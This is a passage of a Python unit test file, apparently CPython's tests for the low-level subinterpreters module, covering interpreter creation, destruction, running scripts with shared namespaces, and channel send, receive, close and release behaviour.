def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(-1)
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
id = interpreters.InterpreterID('10', force=True)
self.assertEqual(int(id), 10)
id = interpreters.InterpreterID(10.0, force=True)
self.assertEqual(int(id), 10)
class Int(str):
def __init__(self, value):
self._value = value
def __int__(self):
return self._value
id = interpreters.InterpreterID(Int(10), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
for id in [-1, 'spam']:
with self.subTest(id):
with self.assertRaises(ValueError):
interpreters.InterpreterID(id)
with self.assertRaises(OverflowError):
interpreters.InterpreterID(2**64)
with self.assertRaises(TypeError):
interpreters.InterpreterID(object())
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
with self.assertRaises(RuntimeError):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
class RunStringTests(TestBase):
SCRIPT = dedent("""
with open('{}', 'w') as out:
out.write('{}')
""")
FILENAME = 'spam'
def setUp(self):
super().setUp()
self.id = interpreters.create()
self._fs = None
def tearDown(self):
if self._fs is not None:
self._fs.close()
super().tearDown()
@property
def fs(self):
if self._fs is None:
self._fs = FSFixture(self)
return self._fs
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(RuntimeError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
cid = interpreters._channel_id('10', force=True)
self.assertEqual(int(cid), 10)
cid = interpreters._channel_id(10.0, force=True)
self.assertEqual(int(cid), 10)
class Int(str):
def __init__(self, value):
self._value = value
def __int__(self):
return self._value
cid = interpreters._channel_id(Int(10), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
for cid in [-1, 'spam']:
with self.subTest(cid):
with self.assertRaises(ValueError):
interpreters._channel_id(cid)
with self.assertRaises(OverflowError):
interpreters._channel_id(2**64)
with self.assertRaises(TypeError):
interpreters._channel_id(object())
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert(obj == b'spam')
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
